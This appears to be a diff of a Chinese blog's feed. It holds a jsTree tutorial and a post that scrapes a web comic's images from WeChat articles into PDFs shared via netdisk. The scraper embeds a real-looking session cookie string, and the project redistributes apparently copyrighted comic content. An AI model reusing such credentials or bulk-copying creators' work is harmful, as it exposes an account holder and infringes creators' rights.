    7. console.log(data.selected);:在控制台输出当前选中节点的标识。
    8. $('#jstree').jstree(true).select_node('child_node_1');:通过 jsTree 方法选择指定节点。
    9. $.jstree.reference('#jstree').select_node('child_node_1');:通过 jsTree 引用选择指定节点。

    ​ 总的来说,这段代码使用 jsTree 插件创建了一个简单的树形结构,并提供了一些与树交互的功能。可以通过点击按钮或选择节点来触发事件,并将选中节点的标识输出到控制台。

    JSON 形式

    ​建一个 <div> 存放这个树:

    <div id="jsonjsTree"></div>

    ​建一个 json 文件存放数据。

    ​这里引入了 Font Awesome 自定义图标:

    [
    {
    "id": "0",
    "text": "根节点1",
    "state": {
    "opened": true
    },
    "children": [
    {
    "text": "child1",
    "icon": "fas fa-house",
    "li_attr": {
    "style": "color: var(--text-link);"
    }
    },
    {"text": "child2"}
    ]
    },
    {
    "id": "1",
    "text": "根节点2",
    "children": [
    {"text": "child1"},
    {"text": "child2"}
    ]
    }
    ]

    ​读取 json 格式的数据:

    $("#jsonjsTree").jstree({
    'core': {
    'data': [
    {
    "id": "0",
    "text": "根节点1",
    "state": {
    "opened": true
    },
    "children": [
    {
    "text": "child1",
    "icon": "fas fa-house",
    "li_attr": {
    "style": "color: var(--text-link);"
    }
    },
    {"text": "child2"}
    ]
    },
    {
    "id": "1",
    "text": "根节点2",
    "children": [
    {"text": "child1"},
    {"text": "child2"}
    ]
    }
    ]
    }
    });

    ​这里改为读取 data.json 的数据到 'data' 中:

    $("#jsonjsTree").jstree({
    'core': {
    'data': function (node, cb) {
    fetch('data.json') // JSON 文件的路径
    .then(response => response.json()) // 解析 JSON 数据
    .then(data => cb(data)) // 调用回调函数传递数据
    .catch(error => alert('无法加载数据!')); // 错误处理
    }
    }
    });

    ​最终效果:


    ​真不错!现在我想将它封装成一个类:

    class jsTreeObject {
    constructor(id, data) {
    this.div = $('<div></div>').attr('id', id);
    this.div.jstree({
    'core': {
    'data': function (_, cb) {
    fetch(data)
    .then(response => response.json()) // 解析 JSON 数据
    .then(data => cb(data)) // 调用回调函数传递数据
    .catch(error => console.error('加载' + data + '失败:' + error)); // 错误处理
    }
    }
    });
    }

    render() {
    $(document.currentScript).before(this.div);
    }
    }

    ​之后在网页中使用如下语句便可渲染:

    <script>new jsTreeObject('ID', 'XXX.json').render();</script>
    ]]>
    + 资源

    快速开始

    官方示例

    ​ 使用 CDNJS 或是本地导入的方式导入所需的文件:

    1
    2
    3
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/themes/default/style.min.css" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/jstree.min.js"></script>

    ​ 开始第一个示例代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    <!DOCTYPE html>
    <html>

    <head>
    <meta charset="utf-8">
    <title>jsTree test</title>
    <!-- 2 load the theme CSS file -->
    <link rel="stylesheet" href="dist/themes/default/style.min.css" />
    </head>

    <body>
    <!-- 3setup a container element -->
    <div id="jstree">
    <!-- 创建一个容器,ID 为 jstree,用于显示树结构。 -->
    <!-- in this example the tree is populated from inline HTML -->
    <ul>
    <!-- 定义一个无序列表,用于构建树状结构的节点。 -->
    <li>Root node 1
    <ul>
    <li id="child_node_1">Child node 1</li>
    <li>Child node 2</li>
    </ul>
    </li>
    <li>Root node 2</li>
    </ul>
    </div>
    <button>demo button</button>
    <!-- 创建一个按钮,点击后会触发某些功能。 -->

    <!-- 4 include the jQuery library -->
    <script src="dist/libs/jquery.min.js"></script>
    <!-- 5 include the minified jstree source -->
    <script src="dist/jstree.min.js"></script>
    <script>
    $(function () {
    // 6 create an instance when the DOM is ready
    $('#jstree').jstree(); // 初始化 #jstree 元素为 jsTree 实例,生成树状结构。
    // 7 bind to events triggered on the tree
    $('#jstree').on("changed.jstree", function (e, data) { // 绑定事件处理程序,当树的选择发生改变时,会将选中的节点 ID 打印到控制台。
    console.log(data.selected);
    });
    // 8 interact with the tree - either way is OK
    $('button').on('click', function () { // 为按钮绑定点击事件,点击时执行以下操作:
    $('#jstree').jstree(true).select_node('child_node_1'); // 选择 ID 为 child_node_1 的节点。
    $('#jstree').jstree('select_node', 'child_node_1'); // 选择节点的另一种方式。
    $.jstree.reference('#jstree').select_node('child_node_1'); // 通过 jsTree 的引用选择节点。
    });
    });
    </script>
    </body>

    </html>
    示例代码简介

    ​ 这段代码是一个使用 jsTree 插件创建树形结构的示例。以下是代码的主要部分解释:

    1. <!DOCTYPE html>:声明 HTML 文档类型。
    2. <head>:头部标签,用于指定文档相关信息。
      • <meta charset="utf-8">:指定文档使用 UTF-8 字符编码。
      • <title>jsTree test</title>:设置页面标题。
      • <link rel="stylesheet" href="dist/themes/default/style.min.css" />:引入样式文件。
    3. <body>:主体标签,包含页面内容。
      • <div id="jstree">:设置一个容器元素,用来显示树形结构。
        • <ul>:无序列表,用来存放树的节点。
          • <li>:列表项,代表树的节点。
            • <ul>:嵌套的列表项,表示子节点。
              • <li id="child_node_1">Child node 1</li>:具体的子节点。
      • <button>demo button</button>:按钮元素,用来演示与树交互的操作。
    4. <script src="dist/libs/jquery.min.js"></script>:引入 jQuery 库。
    5. <script src="dist/jstree.min.js"></script>:引入 jsTree 插件。
    6. $(function () { ... });:使用 jQuery 的 DOM 就绪函数,确保在 DOM 加载完成后执行代码。
      • $('#jstree').jstree();:将 #jstree 元素初始化为一个 jsTree 实例。
      • $('#jstree').on("changed.jstree", function (e, data) { ... });:绑定 changed.jstree 事件的回调函数,当树的选中节点发生变化时触发。
      • $('button').on('click', function () { ... });:给按钮绑定点击事件的回调函数。
    7. console.log(data.selected);:在控制台输出当前选中节点的标识。
    8. $('#jstree').jstree(true).select_node('child_node_1');:通过 jsTree 方法选择指定节点。
    9. $.jstree.reference('#jstree').select_node('child_node_1');:通过 jsTree 引用选择指定节点。

    ​ 总的来说,这段代码使用 jsTree 插件创建了一个简单的树形结构,并提供了一些与树交互的功能。可以通过点击按钮或选择节点来触发事件,并将选中节点的标识输出到控制台。

    JSON 形式

    ​建一个 <div> 存放这个树:

    1
    <div id="jsonjsTree"></div>

    ​建一个 json 文件存放数据。

    ​这里引入了 Font Awesome 自定义图标:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    [
    {
    "id": "0",
    "text": "根节点1",
    "state": {
    "opened": true
    },
    "children": [
    {
    "text": "child1",
    "icon": "fas fa-house",
    "li_attr": {
    "style": "color: var(--text-link);"
    }
    },
    {"text": "child2"}
    ]
    },
    {
    "id": "1",
    "text": "根节点2",
    "children": [
    {"text": "child1"},
    {"text": "child2"}
    ]
    }
    ]

    ​读取 json 格式的数据:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    $("#jsonjsTree").jstree({
    'core': {
    'data': [
    {
    "id": "0",
    "text": "根节点1",
    "state": {
    "opened": true
    },
    "children": [
    {
    "text": "child1",
    "icon": "fas fa-house",
    "li_attr": {
    "style": "color: var(--text-link);"
    }
    },
    {"text": "child2"}
    ]
    },
    {
    "id": "1",
    "text": "根节点2",
    "children": [
    {"text": "child1"},
    {"text": "child2"}
    ]
    }
    ]
    }
    });

    ​这里改为读取 data.json 的数据到 'data' 中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    $("#jsonjsTree").jstree({
    'core': {
    'data': function (node, cb) {
    fetch('data.json') // JSON 文件的路径
    .then(response => response.json()) // 解析 JSON 数据
    .then(data => cb(data)) // 调用回调函数传递数据
    .catch(error => alert('无法加载数据!')); // 错误处理
    }
    }
    });

    ​最终效果:


    ​真不错!现在我想将它封装成一个类:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    class jsTreeObject {
    constructor(id, data) {
    this.div = $('<div></div>').attr('id', id);
    this.div.jstree({
    'core': {
    'data': function (_, cb) {
    fetch(data)
    .then(response => response.json()) // 解析 JSON 数据
    .then(data => cb(data)) // 调用回调函数传递数据
    .catch(error => console.error('加载' + data + '失败:' + error)); // 错误处理
    }
    }
    });
    }

    render() {
    $(document.currentScript).before(this.div);
    }
    }

    ​之后在网页中使用如下语句便可渲染:

    1
    <script>new jsTreeObject('ID', 'XXX.json').render();</script>
    ]]>
    @@ -141,7 +141,7 @@ /posts/Book-%E5%A6%82%E6%9E%9C%E6%AD%B7%E5%8F%B2%E6%98%AF%E4%B8%80%E7%BE%A4%E5%96%B5/ - .scroll { max-height: 60vh; overflow: auto; padding: 0 15px;}

    归档

    第一卷 夏商西周

    回数标题
    第一回华夏诞生
    第二回统一战争
    第三回三皇五帝
    第四回大禹建国
    第五回夏家天下
    第六回少康复国
    第七回商汤灭夏
    第八回伊尹辅政
    第九回武丁中兴
    第十回末代商王
    第十一回西周灭商
    第十二回周公治国
    第十三回西周东周

    第二卷 春秋战国

    回数标题
    第十四回霸王初现
    第十五回大器晚成
    第十六回一鸣惊人
    第十七回威震东南
    第十八回吴越相争
    第十九回三家分晋
    第二十回商鞅变法
    第二十一回六国合纵
    第二十二回以横破纵
    第二十三回昭王称霸
    第二十四回乱世巨贾
    第二十五回新王登基
    第二十六回千秋一统

    第三卷 秦楚两汉

    回数标题
    第二十七回风暴前夕
    第二十八回揭竿而起
    第二十九回霸王诞生
    第三十回大风起兮
    第三十一回双雄并立
    第三十二回楚汉争雄
    第三十三回吕氏专政
    第三十四回文景之治
    第三十五回汉武大帝
    第三十六回王莽代汉
    第三十七回风起绿林
    第三十八回光武复国

    第四卷 东汉末年

    回数标题
    第三十九回黄昏时刻
    第四十回乱世重临
    第四十一回关东联军
    第四十二回逐鹿中原
    第四十三回孟德崛起
    第四十四回官渡对峙
    第四十五回统一北方
    第四十六回江东猛虎
    第四十七回孙权守业
    第四十八回没落贵族
    第四十九回必争之地
    第五十回孙刘联盟
    第五十一回赤壁之战

    第五卷 乱世三国

    回数标题
    第五十二回刘备立足
    第五十三回巧取益州
    第五十四回联盟破裂
    第五十五回曹魏代汉
    第五十六回夷陵之战
    第五十七回永安托孤
    第五十八回诸葛治蜀
    第五十九回以攻为守
    第六十回司马侍曹
    第六十一回正始之变
    第六十二回强弩之未
    第六十三回同归于晋
    第六十四回暗流涌动

    第六卷 魏晋南北

    回数标题
    第六十五回烈烈南风
    第六十六回八王之乱
    第六十七回刘汉灭晋
    第六十八回苻氏争雄
    第六十九回淝水之战
    第七十回刘裕建业
    第七十一回威服八方
    第七十二回仓皇北顾
    第七十三回太和改制
    第七十四回孝文改革
    第七十五回北魏分裂
    第七十六回杨氏建隋
    第七十七回南北归一

    第七卷 隋唐风云

    回数标题
    第七十八回开皇之治
    第七十九回储君之争
    第八十回大业难成
    第八十一回潜龙在渊
    第八十二回李氏崛起
    第八十三回雄鹰展翅
    第八十四回喋血禁门
    第八十五回贞观之治
    第八十六回日月临空
    第八十七回武周女皇
    第八十八回韦后专权
    第八十九回太平公主

    第八卷 盛世大唐

    回数标题
    第九十回先天政变
    第九十一回开元之治
    第九十二回边疆兵变
    第九十三回卷土重来
    第九十四回代宗平乱
    第九十五回藩镇割据
    第九十六回元和中兴
    第九十七回甘露之变
    第九十八回朋党之争
    第九十九回黄巢起义
    第一百回朱温叛变
    第一百零一回盛唐终声

    第九卷 五代十国

    回数标题
    第一百零二回后唐灭梁
    第一百零三回邺都之变
    第一百零四回契丹崛起
    第一百零五回引狼入室
    第一百零六回辽朝入主
    第一百零七回后汉建立
    第一百零八回郭氏开国
    第一百零九回世宗革新
    第一百一十回南唐兴起
    第一百一十一回南北一战
    第一百一十二回陈桥兵变
    第一百一十三回平定四方

    第十卷 宋辽金夏

    回数标题
    第一百一十四回宋初集权
    第一百一十五回烛影斧声
    第一百一十六回萧后兴辽
    第一百一十七回澶渊之盟
    第一百一十八回党项崛起
    第一百一十九回元昊立夏
    第一百二十回庆历和议
    第一百二十一回熙宁变法
    第一百二十二回元祐更化
    第一百二十三回女真建国
    第一百二十四回辽灭金兴
    第一百二十五回靖康之变

    第十一卷 南宋金元

    回数标题
    第一百二十六回尽忠报国
    第一百二十七回绍兴和议
    第一百二十八回海陵夺位
    第一百二十九回采石之战
    第一百三十回隆兴和议
    第一百三十一回乾淳之治
    第一百三十二回一代天骄
    第一百三十三回蒙古扩张
    第一百三十四回蒙古灭金
    第一百三十五回端平入洛
    第一百三十六回元朝建立
    第一百三十七回混一天下

    第十二卷 元末明初

    回数标题
    第一百三十八回世祖立制
    第一百三十九回成宗之立
    第一百四十回权臣乱政
    第一百四十一回旧政更化
    第一百四十二回红巾起义
    第一百四十三回高邮之战
    第一百四十四回察罕伐宋
    第一百四十五回崛起布衣
    第一百四十六回荆楚之雄
    第一百四十七回略定南方
    第一百四十八回统一方夏
    第一百四十九回洪武之治

    第十三卷 大明皇朝

    回数标题
    第一百五十回接班之难
    第一百五十一回建文削藩
    第一百五十二回靖难之役
    第一百五十三回永乐大帝
    第一百五十四回仁宣之治
    第一百五十五回土木之变
    第一百五十六回少保破敌
    第一百五十七回夺门之变
    第一百五十八回宪宗继业
    第一百五十九回武宗驭国
    第一百六十回大礼之争
    第一百六十一回功业中辍

    第十四卷 明末清初

    回数标题
    第一百六十二回威震海疆
    第一百六十三回江陵权柄
    第一百六十四回神宗怠政
    第一百六十五回女真之叛
    第一百六十六回一战定业
    第一百六十七回宁远之战
    第一百六十八回天启党争
    第一百六十九回崇祯新政
    第一百七十回十面之网
    第一百七十一回崇德建清
    第一百七十二回松锦之战
    第一百七十三回大顺灭明

    列表

    1. 如果历史是一群喵
    2. 如果历史是一群喵 | 祖先喵们的统一战争
    3. 吃饭穿衣,竟然都是皇上教的!
    4. 他年少丧父,被迫子承父业,最后靠湿身建立了一个国家
    5. 天下都是我家哒!
    6. 跟你讲一下三千多年前的狗血剧
    7. 他进过局子,装过孙子,最后竟成了天王老子
    8. 这真的只是一段纯洁的君臣关系
    9. 让基友管家,让老婆打架,牛逼的国王就是这么奇葩
    10. 这个锅,他背了几千年…
    11. 猥琐发育,不要浪…
    12. 没想到吧!你经常梦见的男人竟然是个玛丽苏…
    13. 惹怒娘家丢江山,皆因作风不检点
    14. 奉天子以令诸侯,我说的不是曹操…
    15. 他爸追杀他,他弟也追杀他,可他成了霸主…
    16. 一个有心机的肥宅
    17. 倒霉蛋终成霸主…可惜死于暗箭
    18. 两个纠缠不清的男人…
    19. 小弟为何突然叛变,大哥如何阴沟翻船
    20. 发家致富靠砍人…
    21. 一个靠口活横行天下的男人
    22. 秦国的阴谋
    23. 不做我的朋友休想活过今天,做了我的朋友可以活到明天
    24. 做生意这事…他才是史上最强
    25. 刺激,史上第一霸总现在上线了
    26. 举手投降了解下
    27. 到底是谁杀死了秦国
    28. 一场暴雨引发的血案
    29. sorry,他在战场上真的可以为所欲为
    30. 见过流氓创业吗
    31. 流氓打过来了
    32. 昨天你把我踢开,今天我让你狗带
    33. 我的老公是渣男
    34. 父子接力,搞死亲戚
    35. “汉族”因他而得名
    36. 明君的人设,昏君的操作
    37. 那一年,我绿了
    38. 那年,我去了趟河北,结果不得了了……
    39. 读书的果然干不过造谣的
    40. 揭竿起黄巾当立,趁虚入董卓乱国
    41. 一场团战,万万没想到,成了团建……
    42. 是奸雄还是英雄,这个争议他背了一千多年…
    43. 从太监的孙子到称霸一方的军阀,他是怎么做到的呢
    44. 从一起长大的发小,到横行天下的搭档,再到你死我活劲敌
    45. 那年基友想跨过黄河来打我…
    46. 父亲出外务工意外死亡,长子继承家业称霸一方
    47. 父兄双双早逝,单亲少年独撑家业…
    48. 乡村青年创业屡遭挫折,企业老板强留惨遭背叛
    49. 跳个槽而已,前老板竟要追杀他…
    50. 怎么办…只能迎男而上了!
    51. 一把火,改变了三个男人的命运
    52. 刘备借荆州,是怎么一回事?
    53. 君子和小人,刘备究竟是哪一个?
    54. 孙权是不是有点傻白甜?
    55. 【喵咪三国篇】大汉就这么没了 …
    56. 【三国篇下】打完这仗,三国就算开始了~
    57. 刘备死了,凭啥让诸葛亮接班呢
    58. 诸葛亮执政是个什么水平?
    59. 诸葛亮,始终无法胜天半子
    60. 这个男人,熬死了曹操三代人……
    61. 三国里最会演戏的竟然是他…
    62. 三国就这么没了
    63. 曹刘孙这么努力,最后却亏的裤衩都不剩…
    64. 喝酒、炫富、吹牛逼,但我暂时是个好王朝…
    65. 我虽然长得丑…但我老公蠢呀…
    66. 毁掉一个王朝,只需一场家暴…
    67. 五胡十六国是怎么开始的?
    68. 八岁请家教,十二岁当将军,三十八岁就当了天王…
    69. 发生在1600多年前的一场“无间道”…
    70. 东晋就这么完蛋了…
    71. 五胡十六国是怎么结束的?
    72. 南朝实在太“南”了
    73. 发生在北魏的大女主剧
    74. 北魏汉化组登场
    75. 在北魏,最不值钱的可能是皇帝……
    76. 离南北朝结束还差这一个男人
    77. 南北朝就这么结束了
    78. 隋文帝,这个出道即巅峰的男人
    79. 论一个演员的自我修养
    80. 如果隋朝时有劳动节,那劳动者最怕的就是他……
    81. 影帝的表哥,也是个影帝……
    82. 怂一时风平浪静,绕一步天下我有
    83. 李世民登场!
    84. 李世民的坎坷斗争路
    85. 都是摆摊,为啥李世民能用“烂摊子”发财致富?
    86. 要说乘风破浪的姐姐们,她绝对算一个~
    87. 爬最高的山…杀最亲的崽…最后她得到了想要的一切
    88. 她抄作业,终究抄成了自己最讨厌的人…
    89. 人气高业务棒,实力女主硬邦邦
    90. 唐玄宗登场!姑侄之间的对决!
    91. 大唐盛世,基本就是从这开始的~
    92. 大唐历史上最著名的胖子,没有之一
    93. 前后脚遇到两个大忽悠,唐朝真是头都大了…
    94. 唐朝八年的叛乱,终于被这个猛男结束了
    95. 为什么说男人的嘴骗人的鬼,看看大唐你就懂了…
    96. 大唐它又行了…
    97. 老太监,不讲武德,这样不好…
    98. 彻底压垮唐朝的,是一场对家之间的战争…
    99. 历史不断证明,千万不要惹落榜考生…
    100. 我们100话啦!大唐也快完蛋啦~
    101. 这下大唐真的完蛋了…
    102. 大唐完蛋了,五代十国开始了~
    103. 半路被抓去当皇帝是啥感受?
    104. 炎帝后裔、太阳转世、来自北境的契丹之王!
    105. 他因一己私利,将国家推入深渊…
    106. 当会打仗的吃饱了,末日也就到了
    107. 我愿称之为偷塔之王
    108. 他认真打仗,到头全家被端,只能造反当皇帝了
    109. 这应该是五代里最完美的崽了
    110. 五代都讲了,十国又是怎样的呢?
    111. 拳打南唐美男子,脚踹契丹辽睡王,他真是五代皇帝中的一股清流…
    112. 宋朝开始了~
    113. 五代十国篇结束~咱们下季再见~
    114. 历史喵第十季开更啦!
    115. 那天夜里,他们兄弟俩在屋里发生了什么呢?
    116. 这绝对是辽朝的大女主剧…
    117. 本来想欺负孤儿寡母的,没想到对面是个女王大人…
    118. 大宋又双叒因为想占便宜而翻车了…
    119. 大三角!修罗场!最后结局竟是…
    120. 虽然委屈,但大宋又又又跟人和解了…
    121. 王安石变法
    122. 你相信光吗?反正王安石应该是不信的…
    123. 宋辽夏一起摆烂,结果来了个新家伙…
    124. 70万对2万,优势在我,怎么可能输?
    125. 摊上这样一对父子,大宋南了…
    126. 南宋最强的崽登场!
    127. 南宋最强的崽…也救不了南宋啊…
    128. 我想当个好皇帝,但手握男主剧本的是我堂弟…
    129. 本来只是去劳军,却不小心打了胜仗?
    130. 想挺起腰杆子,可惜实力还是不够啊
    131. 打架打不过,只能拼一些内力…
    132. 一代天骄登场!
    133. 你知道成吉思汗有多强悍吗!
    134. 南宋:老子终于报仇了!
    135. 南宋收复中原了!但…又好像没收…
    136. 建立元朝的那个男人,他来了…….
    137. 南宋结束,大元一统
    138. 《元末明初》篇开更!
    139. 皇位谁来坐?别急先开个会
    140. 怎样形容一个权臣的势力大呢?200多个字的头衔!
    141. 能文能武的富二代,大义灭亲打工仔…
    142. 元朝治好了黄河,却冲走了自己
    143. 大元:教科书式的亡国之君出现了
    144. 元朝的危机解除了,但又似乎没有解除…
    145. 元朝最不该惹的就是这个乞丐
    146. 事实证明,卖鱼的都惹不起啊!
    147. 火烧连环船!这说的可不是赤壁之战
    148. 大元谢幕,大明登场!
    149. 明朝的开局,是地狱难度的
    150. 史上最强太子,就是命太短…
    151. 我只是想把位子坐稳,叔叔们吃点苦怎么啦?
    152. 以一府抗一国,史上最强藩王!
    153. 大明最猛皇帝,天子守国门!
    154. 大明圣孙,明朝文武双全型王者
    155. 大明帝六代,如何一战成名?
    156. 受命于危难之际!为大明续命近两百年!
    157. 几百年前的月圆之夜,他和皇位“团圆” 了
    158. 有个乱糟糟的爹,接手一个乱糟糟的天下…
    159. 他明明拥有天下,却似乎更向往自由…
    160. 本以为扶上位的是个傀儡,没想到是个祖宗……
    161. 说好的宫斗爽剧,怎么就成了修仙模拟器?
    162. 传奇名将登场!戚继光为啥这么猛?
    163. 大明第一首辅,救世宰相的铁血改革路!
    164. 孩子管太紧,长大了可能报复性消费…
    165. 东北“王子”复仇记,女真再次登场!
    166. 后金对大明,萨尔浒之战!
    167. 宁远之战!努尔哈赤的滑铁卢
    168. 江山什么的…哪有木工有趣呀…
    169. 好消息:阉党没了!坏消息:大明也快没了
    170. 仗打赢了,但大明的时间也不多了…
    171. 大明已读不回,贵二代趁机爆改!
    172. 明朝最后的豪赌!赌输了…
    173. 放牛娃建立起的皇朝,被放羊娃给灭了
    174. 从孤儿到最强亲王,小王子的翻身之路
    175. 进了京之后,大顺就开始不顺了
    176. 一个月换俩老板是啥体验?
    177. 明末义军领袖,除了快递员,还有个转业的……
    178. 这个皇帝实习期有点长…
    179. 鳌拜:我全都要!康熙:拿来吧你!
    180. 康熙:我要打三个!
    181. 什么是真正的狠人?是61年每天早起…
    182. 夺嫡大舞台!有种你就来!
    183. 雍正:看我怎么用“不争”赢得胜利!
    184. 虽然工龄短,但工作量大呀!

    输出

    爬虫

    ​将上述的网址存到一个列表中:

    import re

    # 给定的 Markdown 文本
    markdown_text = """
    1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
    2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
    3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
    4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
    5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
    6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
    ...
    """

    # 使用正则表达式提取所有 URL
    urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)

    ​从 利用Python爬取公众号上的图片(附源码) 抄一个代码!然后一阵暴改!

    from tqdm import tqdm
    import requests
    from bs4 import BeautifulSoup
    import time
    import random
    import os

    headers = {
    'cookie':'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
    }

    index = 0

    for url in urls:
    index += 1
    print("第 " + str(index) + ' 章')
    try:
    response = requests.get(url, headers=headers)
    # print(response.status_code) # 打印响应状态码
    # 获取网页数据
    html = response.text

    soup = BeautifulSoup(html, 'html.parser')
    img_list = soup.find_all('img')
    except Exception as e:
    print(f"{index}:错误 - {str(e)}")

    for img_url in tqdm(img_list):
    try:
    name = str(img_list.index(img_url))
    # print(img_url)
    img_link = img_url.get('data-src')
    if img_link != None:
    # print(img_link)
    response2 = requests.get(img_link)
    # 图片是二进制数据,获取要用content,文本文件用text
    img_content = response2.content
    # 设置休眠时间,防止速度过快被封
    time.sleep(random.uniform(3, 5))
    # 保存文件
    folder_path = './如果历史是一群喵/' + '第 '+ str(index) + ' 章'
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    with open(folder_path + '/' + name + '.' + img_link.split('=')[-1],'wb+') as f:
    f.write(img_content)
    f.close()
    # print(f'第 {name} 张图片下载成功')
    except Exception as e:
    print('第 '+ str(index) + ' 章:错误:' + str(e))

    格式化

    ​这里手工洗了一下数据,把部分章节开头的 .gif 图片替换成了 .jpeg 的格式,162 章后的文件名后缀有问题,也进行了修改。

    import os

    def rename_files_in_folder(folder_path):
    # 遍历文件夹中的所有文件
    for filename in os.listdir(folder_path):
    # 获取完整文件路径
    old_file = os.path.join(folder_path, filename)

    if os.path.isfile(old_file):
    # 如果文件后缀是 .appmsg,改为 .jpeg
    if filename.endswith('.appmsg'):
    new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
    os.rename(old_file, new_file)

    # 如果文件后缀是 .1,改为 .gif
    elif filename.endswith('.1'):
    new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
    os.rename(old_file, new_file)

    # 使用示例
    folder_path = r'./如果历史是一群喵/第 184 章' # 替换为目标文件夹的路径
    rename_files_in_folder(folder_path)

    ​将爬虫得到的各个图片四周填充白色,使其长宽比与 A4 纸大小一致:

    import os
    import re
    from tqdm import tqdm
    from PIL import Image

    load_path = "./如果历史是一群喵"
    save_path = "./如果历史是一群喵 resized"

    # A4 纵向尺寸在 72 DPI 下的像素大小
    A4_width = 595
    A4_height = 840
    A4_aspect_ratio = A4_width / A4_height

    item_list = os.listdir(load_path)
    item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

    # 遍历顶层子文件夹
    for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
    # 自定义排序函数,提取文件名中的数字部分并按数字排序
    file_list = os.listdir(item_path)
    file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
    # 找到第一个后缀不是 '.jpeg' 的文件,移除该元素及之后的所有元素
    for i, file in enumerate(file_list):
    if not file.endswith('.jpeg'):
    file_list = file_list[:i] # 切片操作,保留列表中 i 之前的元素
    break
    # 创建一个 pdf 对象
    pdf = FPDF()
    for image_file in tqdm(file_list):
    image = Image.open(os.path.join(item_path, image_file))
    # 获取原始图片的宽度和高度
    original_width, original_height = image.size

    # 计算新尺寸比例,保持宽高比不变
    aspect_ratio = original_width / original_height

    # 根据宽高比决定如何调整图片
    if aspect_ratio > A4_aspect_ratio:
    # 图片宽度超出比例限制,调整宽度为 A4 宽度,计算高度
    new_width = A4_width
    new_height = int(new_width / aspect_ratio)
    else:
    # 图片高度超出比例限制,调整高度为 A4 高度,计算宽度
    new_height = A4_height
    new_width = int(new_height * aspect_ratio)

    # 调整图片大小
    resized_image = image.resize((new_width, new_height))

    # 创建一个白色的 A4 背景图像
    background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
    # 计算将图片居中放置在 A4 背景中的位置
    left = (A4_width - new_width) // 2
    top = (A4_height - new_height) // 2

    # 将调整后的图片粘贴到背景图像上
    background.paste(resized_image, (left, top))
    # 获取图片的宽度和高度
    width, height = background.size

    folder_path = os.path.join(os.path.join(save_path, item))
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)

    输出 pdf

    ​将上述图片输出成 pdf:

    from fpdf import FPDF
    import re
    import os
    from tqdm import tqdm

    load_path = './如果历史是一群喵 resized/'
    save_path = './如果历史是一群喵 pdf/'

    # 将图像文件转换为 PDF
    def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    # 遍历所有图像文件
    for image_path in image_paths:
    # 添加新的一页
    pdf.add_page()
    # 插入图片,设置为 A4 尺寸的图像(宽度 210mm,高度 297mm)
    pdf.image(image_path, x=0, y=0, w=210, h=297)

    # 输出 PDF 文件
    pdf.output(output_pdf_path)

    for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf') # 输出 PDF 的路径
    images_to_pdf(image_paths, output_pdf_path)

    ​得到最终文件:如果历史是一群喵 pdf_免费高速下载|百度网盘-分享无限制

    ]]>
    + .scroll { max-height: 60vh; overflow: auto; padding: 0 15px;}

    归档

    第一卷 夏商西周

    回数标题
    第一回华夏诞生
    第二回统一战争
    第三回三皇五帝
    第四回大禹建国
    第五回夏家天下
    第六回少康复国
    第七回商汤灭夏
    第八回伊尹辅政
    第九回武丁中兴
    第十回末代商王
    第十一回西周灭商
    第十二回周公治国
    第十三回西周东周

    第二卷 春秋战国

    回数标题
    第十四回霸王初现
    第十五回大器晚成
    第十六回一鸣惊人
    第十七回威震东南
